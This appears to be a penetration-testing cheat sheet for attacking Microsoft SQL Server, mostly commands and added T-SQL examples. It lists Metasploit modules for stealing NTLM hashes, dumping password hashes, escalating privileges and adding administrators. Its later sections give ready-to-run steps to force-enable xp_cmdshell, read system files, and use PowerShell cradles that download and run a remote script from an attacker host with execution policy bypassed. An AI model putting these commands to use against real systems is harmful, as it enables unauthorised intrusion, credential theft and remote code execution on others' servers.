# NTLM theft
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer    # Steal the NTLM hash; start Responder before running it
# Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_idf
# Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as    # If the user has the IMPERSONATE permission, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner       # Escalate from db_owner to sysadmin
# Code execution
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload
# Add a new administrator from a meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
File read
Reading a file through OPENROWSET(BULK ...) requires the ADMINISTER BULK OPERATIONS permission (bulkadmin role) and the file must be readable by the SQL Server service account:
> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
> go
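The same read as an added T-SQL example (not from the original page): it first asks the server whether the path exists and is visible to the service account, then reads the file. The hosts path is the one above; the `#chk` table and the fallback message are illustration only. OPENROWSET(BULK) only accepts a literal path, so it cannot take the variable used for the check.

```sql
-- Added example: check the path as seen by the SQL Server service account,
-- then read it with OPENROWSET(BULK ...). Needs ADMINISTER BULK OPERATIONS.
DECLARE @path NVARCHAR(260) = N'C:\Windows\System32\drivers\etc\hosts';

-- xp_fileexist returns three columns:
-- (File Exists, File is a Directory, Parent Directory Exists)
CREATE TABLE #chk (file_exists INT, is_directory INT, parent_exists INT);   -- assumed helper table
INSERT INTO #chk EXEC master..xp_fileexist @path;

IF EXISTS (SELECT 1 FROM #chk WHERE file_exists = 1)
BEGIN
    -- SINGLE_CLOB returns the whole file as one text value in the BulkColumn column;
    -- use SINGLE_BLOB instead when the file is binary (raw bytes, VARBINARY).
    SELECT BulkColumn AS Contents
    FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS f;
END
ELSE
    -- A 0 here means either the file is absent or the service account cannot see it.
    SELECT 'file absent or not visible to the service account' AS note;

DROP TABLE #chk;
```

If the check passes but OPENROWSET still fails with an access error, the missing piece is the bulkadmin permission on the login, not file-system access.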
Code execution
To run OS commands on MSSQL, xp_cmdshell must be enabled. It is disabled by default; with sufficient privileges (ALTER SETTINGS, which sysadmin and serveradmin have) it can be turned on with sp_configure.
Check
If it is enabled, the output of whoami (the SQL Server service account) comes back as result rows; if not, the server answers with error 15281 ("SQL Server blocked access to procedure 'sys.xp_cmdshell' ... because this component is turned off").
> xp_cmdshell 'whoami';
> go
Enable xp_cmdshell
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
Force enabling
xp_cmdshell is an advanced option: if 'show advanced options' is 0, the command above fails ("The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option"). Expose the advanced options first, then enable it:
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
File download
Use single quotes for the T-SQL string and double the single quotes inside the PowerShell command; double quotes around the whole command are treated as an identifier when QUOTED_IDENTIFIER is ON (the default for most clients) and the statement fails.
> xp_cmdshell 'powershell.exe -exec bypass iex(new-object net.webclient).downloadstring(''http://<your ip>:<port>/script.ps1'')';
> go
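The download cradle as an added T-SQL example (not from the original page), with the output captured so that a failed download (proxy, name resolution, AMSI, execution policy) shows up as result rows instead of silently returning nothing. The URL keeps the page's `<your ip>:<port>` placeholder; the on-disk path `C:\Windows\Temp\script.ps1` and the `#out` table are assumptions for illustration.

```sql
-- Added example: in-memory and on-disk download through xp_cmdshell, with
-- the inner single quotes doubled so each call is a single T-SQL string.
CREATE TABLE #out (line NVARCHAR(4000));   -- assumed helper table

-- In-memory: fetch and run the script without writing it to disk.
INSERT INTO #out EXEC master..xp_cmdshell
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "iex (New-Object Net.WebClient).DownloadString(''http://<your ip>:<port>/script.ps1'')"';

-- On-disk alternative: download first, run second, so each step can be
-- checked on its own (e.g. with dir) when the in-memory cradle fails.
INSERT INTO #out EXEC master..xp_cmdshell
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object Net.WebClient).DownloadFile(''http://<your ip>:<port>/script.ps1'', ''C:\Windows\Temp\script.ps1'')"';
INSERT INTO #out EXEC master..xp_cmdshell
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\script.ps1';

-- PowerShell errors come back as ordinary output rows.
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;
```

The double quotes around the `-Command` argument are safe inside a single-quoted T-SQL string; only the single quotes need doubling.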